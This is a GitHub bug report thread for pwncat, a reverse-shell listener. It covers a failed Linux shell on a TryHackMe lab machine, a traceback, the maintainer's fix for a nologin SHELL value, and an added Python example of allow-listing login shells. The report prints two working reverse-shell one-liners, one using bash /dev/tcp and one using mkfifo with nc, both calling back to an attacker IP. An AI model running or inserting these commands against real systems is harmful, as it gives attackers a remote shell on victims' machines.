[BUG]Failed to establish shell on linux #116

Closed
3m0W33D opened this issue Jun 10, 2021 · 2 comments · Fixed by #121
Labels
bug Something isn't working

3m0W33D commented Jun 10, 2021


Describe the bug
A reverse shell should be established with a bash payload; however, after waiting for a long while, no shell was established. Previously, before the Windows update, the bash payload worked with pwncat.

Describe the target system
This https://tryhackme.com/room/wekorra room. Linux system, presumably Ubuntu.

To Reproduce
Steps to reproduce the behavior:

  1. Getting RCE on the web portal
  2. I enter the command bash -c 'exec bash -i &>/dev/tcp/$IP/4444 <&1'
  3. I waited for a while and then the error was shown as below.
└─$ pc  -lp 4444
[05:23:28] Welcome to pwncat 🐈!                                                                                                                                                                                               __main__.py:127
[05:24:09] received connection from 10.10.243.111:52186                                                                                                                                                                             bind.py:58
[05:24:12] 10.10.243.111:52186: registered new host w/ db                                                                                                                                                                       manager.py:491
[05:24:43] connection failed: channel recieve timed out: b' exec /usr/bin/script -qc /usr/sbin/nologin /dev/null 2>&1\nThis account is currently not available.\r\n'                                                            manager.py:491
(local) pwncat$ sessions
[05:25:29] warning: 10.10.243.111:52186: channel closed                                                                                                                                                                         manager.py:491
Traceback (most recent call last):
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/channel/socket.py", line 96, in send
    written += self.client.send(data[written:])
BrokenPipeError: [Errno 32] Broken pipe

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/commands/__init__.py", line 591, in run
    self.dispatch_line(line)
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/commands/__init__.py", line 670, in dispatch_line
    command.run(self.manager, args)
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/commands/sessions.py", line 57, in run
    session.current_user().name,
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/manager.py", line 141, in current_user
    return self.find_user(uid=self.platform.getuid())
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/manager.py", line 146, in find_user
    for user in self.run("enumerate.gather", progress=False, types=["user"]):
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/manager.py", line 196, in run
    return module.run(self, **kwargs)
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/modules/__init__.py", line 247, in decorator
    results = [
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/modules/__init__.py", line 247, in <listcomp>
    results = [
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/modules/agnostic/enumerate/gather.py", line 145, in run
    for item in module.run(session, types=types):
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/modules/__init__.py", line 247, in decorator
    results = [
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/modules/__init__.py", line 247, in <listcomp>
    results = [
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/modules/enumerate.py", line 193, in run
    for item in self.enumerate(session):
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/modules/linux/enumerate/user/__init__.py", line 23, in enumerate
    with passwd.open("r") as filp:
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/platform/__init__.py", line 303, in open
    return self._target.open(
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/platform/linux.py", line 1179, in open
    for method in self.gtfo.iter_methods(
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/gtfobins.py", line 493, in iter_methods
    path = self.which(name)
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/platform/__init__.py", line 668, in which
    path = self._do_which(name)
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/platform/linux.py", line 735, in _do_which
    result = self.run(
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/platform/__init__.py", line 777, in run
    p = popen_class(
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/platform/linux.py", line 1055, in Popen
    self.channel.send(command + b"\n")
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/channel/socket.py", line 39, in _wrapper
    return method(self, *args, **kwargs)
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/channel/socket.py", line 101, in send
    raise ChannelClosed(self) from exc
pwncat.channel.ChannelClosed: channel unexpectedly closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/__main__.py", line 266, in main
    manager.interactive()
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/manager.py", line 552, in interactive
    self.parser.run()
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/commands/__init__.py", line 605, in run
    exc.cleanup(self.manager)
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/channel/__init__.py", line 57, in cleanup
    session = manager.find_session_by_channel(self.channel)
AttributeError: 'Manager' object has no attribute 'find_session_by_channel'

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/kali/tools/pwncat-env/bin/pc", line 8, in <module>
    sys.exit(main())
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/__main__.py", line 282, in main
    progress.update(task, status="done!", completed=100)
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/manager.py", line 420, in __exit__
    self.sessions[0].close()
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/manager.py", line 322, in close
    self.platform.exit()
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/platform/linux.py", line 561, in exit
    self.channel.send(b"exit\n")
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/channel/socket.py", line 38, in _wrapper
    raise ChannelError(self, "channel not connected")
pwncat.channel.ChannelError: channel not connected

I also tested a reverse shell with netcat rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $IP 4444 >/tmp/f, and this connection was successfully established, and I was able to interact without any issues.

Expected behavior
Connection should be established as usual

@3m0W33D 3m0W33D added the bug Something isn't working label Jun 10, 2021
@calebstewart
Owner

This should be a relatively easy fix. It appears that for some reason the SHELL environment variable pointed to /usr/sbin/nologin. I have no clue why that would be the case, but when spawning the pty, pwncat attempts to reuse your existing shell. This ended up just disconnecting you, because nologin simply prints a message and exits. 😫

calebstewart added a commit that referenced this issue Jun 12, 2021
I'm not sure why this would happen, but it should fix #116
@Mitul16
Contributor

Mitul16 commented Jun 14, 2021

This is not really required, but since you have added a check for nologin, you may want to check for multiple SHELL values instead of just checking nologin, or do the reverse, that is, check for SHELLs that allow login.
Some examples are below:

cat /etc/passwd | cut -d: -f7 | sort | uniq | grep -v 'sh$'

# Output ->
/bin/false
/bin/sync
/usr/sbin/nologin

@calebstewart calebstewart added this to the Release v0.4.1 milestone Jun 14, 2021
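
The difference between deny-listing nologin and allow-listing login shells, as suggested in the last comment, shown as an added example (not pwncat's code and not posted in the thread). The passwd and /etc/shells contents are constructed sample data, and the function names and the /bin/sh fallback are assumptions.

```python
# Added example (not pwncat code): deny-list vs allow-list checks on a SHELL value.
from pathlib import PurePosixPath

# Constructed sample data, modelled on the shells listed in the comment above.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
sync:x:4:65534:sync:/bin:/bin/sync
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
mysql:x:111:116:MySQL Server:/nonexistent:/bin/false
dev:x:1000:1000::/home/dev:/usr/bin/zsh
"""
SAMPLE_ETC_SHELLS = """\
# /etc/shells: valid login shells
/bin/sh
/bin/bash
/usr/bin/zsh
"""

def passwd_shells(passwd_text):
    """Map user name -> login shell (field 7 of each passwd line)."""
    shells = {}
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and not line.startswith("#"):
            shells[fields[0]] = fields[6]
    return shells

def valid_shells(etc_shells_text):
    """Parse /etc/shells: one absolute path per line, '#' starts a comment."""
    return {l.strip() for l in etc_shells_text.splitlines()
            if l.strip().startswith("/")}

def denylist_ok(shell):
    """Deny-list: reject only nologin, whatever directory it lives in."""
    return PurePosixPath(shell).name != "nologin"

def allowlist_ok(shell, allowed):
    """Allow-list: accept only shells the system lists as login shells."""
    return shell in allowed

def pick_shell(env_shell, allowed, fallback="/bin/sh"):
    """Reuse $SHELL only if it is allow-listed; otherwise use the fallback."""
    return env_shell if allowlist_ok(env_shell, allowed) else fallback

def missed_by_denylist(passwd_text, etc_shells_text):
    """Users whose shell passes the deny-list but is not a real login shell."""
    allowed = valid_shells(etc_shells_text)
    return sorted(u for u, s in passwd_shells(passwd_text).items()
                  if denylist_ok(s) and not allowlist_ok(s, allowed))
```

On the sample data the nologin-only check lets /bin/false and /bin/sync through, while the allow-list rejects all three non-login shells.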